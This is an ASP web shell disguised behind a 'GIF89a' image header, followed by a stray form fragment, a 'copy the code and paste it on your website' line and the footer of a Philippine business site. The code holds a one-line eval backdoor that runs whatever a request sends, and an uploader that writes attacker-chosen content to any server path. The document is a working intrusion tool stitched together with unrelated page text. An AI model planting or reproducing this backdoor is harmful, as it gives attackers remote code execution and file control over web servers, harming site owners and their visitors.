GIF89a
;
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form("filepath")
msg=Request.form("message")
if Trim(request("filepath"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&msg& "")
if err =0 Then
response.write "ok"
else
response.write "no"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>

value="<%=server.mappath("go.asp")%>">


Just copy the code and paste it on your website

You are visitor #: 213984
© 2009 www.laguna.biz.ph All Rights Reserved. | BITS, Philippines
Home | About Us | Opportunities | Business Events | News | Contact Us| Admin